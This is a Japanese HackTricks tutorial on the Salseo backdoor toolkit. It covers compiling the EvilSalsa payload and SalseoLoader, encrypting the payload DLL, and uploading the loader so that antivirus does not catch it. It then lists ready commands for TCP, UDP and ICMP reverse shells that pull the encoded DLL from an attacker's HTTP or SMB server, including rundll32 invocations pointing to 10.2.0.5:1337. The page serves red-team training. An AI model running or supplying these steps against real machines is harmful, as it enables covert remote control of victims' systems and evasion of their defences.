# Salseo {% hint style="success" %} AWSハッキングの学習と練習:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCPハッキングの学習と練習:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricksのサポート * [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェック! * 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォロー**してください。 * **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、ハッキングトリックを共有してください。
{% endhint %} ## バイナリのコンパイル Githubからソースコードをダウンロードし、**EvilSalsa**と**SalseoLoader**をコンパイルします。コードをコンパイルするには**Visual Studio**がインストールされている必要があります。 これらのプロジェクトを、使用するWindowsボックスのアーキテクチャ用にコンパイルします(Windowsがx64をサポートしている場合は、そのアーキテクチャ用にコンパイルします)。 Visual Studio内の**左側の"Build"タブ**の**"Platform Target"**でアーキテクチャを選択できます。 (\*\*このオプションが見つからない場合は、**"Project Tab"**をクリックしてから**"\ Properties"**をクリックします) ![](<../.gitbook/assets/image (132).png>) その後、両方のプロジェクトをビルドします(Build -> Build Solution)(ログ内に実行可能ファイルのパスが表示されます): ![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>) ## バックドアの準備 まず、**EvilSalsa.dll**をエンコードする必要があります。これを行うには、Pythonスクリプト**encrypterassembly.py**を使用するか、プロジェクト**EncrypterAssembly**をコンパイルできます: ### **Python** ``` python EncrypterAssembly/encrypterassembly.py python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt ``` ### Windows ### ウィンドウズ ``` EncrypterAssembly.exe EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt ``` Ok, 今、Salseoのすべてを実行するために必要なものが揃いました: **エンコードされたEvilDalsa.dll** と **SalseoLoaderのバイナリ**。 **SalseoLoader.exeバイナリをマシンにアップロードしてください。どのAVにも検出されないようにしてください...** ## **バックドアを実行する** ### **TCPリバースシェルを取得する(HTTPを介してエンコードされたdllをダウンロードする)** リバースシェルリスナーとHTTPサーバーを起動して、エンコードされたevilsalsaを提供することを忘れないでください。 ``` SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp ``` ### **UDPリバースシェルを取得する(SMBを介してエンコードされたdllをダウンロードする)** リバースシェルリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためのSMBサーバー(impacket-smbserver)を起動することを忘れないでください。 ``` SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp ``` ### **ICMPリバースシェルを取得する(エンコードされたdllはすでに被害者の中にある)** **今回は、リバースシェルを受け取るためにクライアントに特別なツールが必要です。ダウンロード:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) #### **ICMP応答を無効にする:** ``` sysctl -w net.ipv4.icmp_echo_ignore_all=1 #You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0 ``` #### クライアントを実行する: ``` python icmpsh_m.py "" "" ``` #### 被害者の内部で、salseoのことを実行しましょう: ``` SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ``` ## DLLのエクスポートメイン関数としてSalseoLoaderをコンパイルする Visual Studioを使用してSalseoLoaderプロジェクトを開きます。 ### メイン関数の前に追加: \[DllExport] ![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) ### このプロジェクトにDllExportをインストール #### **ツール** --> **NuGet パッケージ マネージャー** --> **ソリューションの NuGet パッケージを管理...** ![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) #### **DllExport パッケージを検索 (Browse タブを使用) し、インストールを押して (ポップアップを受け入れる)** ![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) プロジェクトフォルダに **DllExport.bat** と **DllExport\_Configure.bat** というファイルが表示されます ### DllExportをアンインストール **アンインストール** を押します (はい、奇妙ですが、信じてください、必要です) ![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>) ### Visual Studioを終了し、DllExport\_configureを実行 単に Visual Studio を **終了** します その後、**SalseoLoaderフォルダ**に移動し、**DllExport\_Configure.bat** を実行します **x64** を選択します (x64ボックス内で使用する場合、私の場合はそうでした)、**System.Runtime.InteropServices** (DllExportの**Namespace**内) を選択し、**Apply** を押します ![](<../.gitbook/assets/image (7) (1) (1) (1) (1).png>) ### プロジェクトを再度Visual Studioで開く **\[DllExport]** はもはやエラーとしてマークされていません ![](<../.gitbook/assets/image (8) (1).png>) ### ソリューションをビルド **Output Type = Class Library** を選択します (プロジェクト --> SalseoLoader プロパティ --> アプリケーション --> Output type = Class Library) ![](<../.gitbook/assets/image (10) (1).png>) **x64プラットフォーム** を選択します (プロジェクト --> SalseoLoader プロパティ --> ビルド --> Platform target = x64) ![](<../.gitbook/assets/image (9) (1) (1).png>) ソリューションを**ビルド**するには: Build --> Build Solution (Outputコンソール内に新しいDLLのパスが表示されます) ### 生成されたDllをテスト 生成されたDllをテストしたい場所にコピーして貼り付けます。 実行: ``` rundll32.exe SalseoLoader.dll,main ``` もしエラーが表示されない場合、おそらく機能するDLLを持っています!! ## DLLを使用してシェルを取得する **HTTP** **サーバー**を使用して、**nc** **リスナー**を設定することを忘れないでください ### Powershell ``` $env:pass="password" $env:payload="http://10.2.0.5/evilsalsax64.dll.txt" $env:lhost="10.2.0.5" $env:lport="1337" $env:shell="reversetcp" rundll32.exe SalseoLoader.dll,main ``` ### CMD ### CMD ``` set pass=password set payload=http://10.2.0.5/evilsalsax64.dll.txt set lhost=10.2.0.5 set lport=1337 set shell=reversetcp rundll32.exe SalseoLoader.dll,main ``` {% hint style="success" %} AWSハッキングの学習と練習:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCPハッキングの学習と練習: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricksのサポート * [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェック! * 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォロー**してください。 * ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
{% endhint %}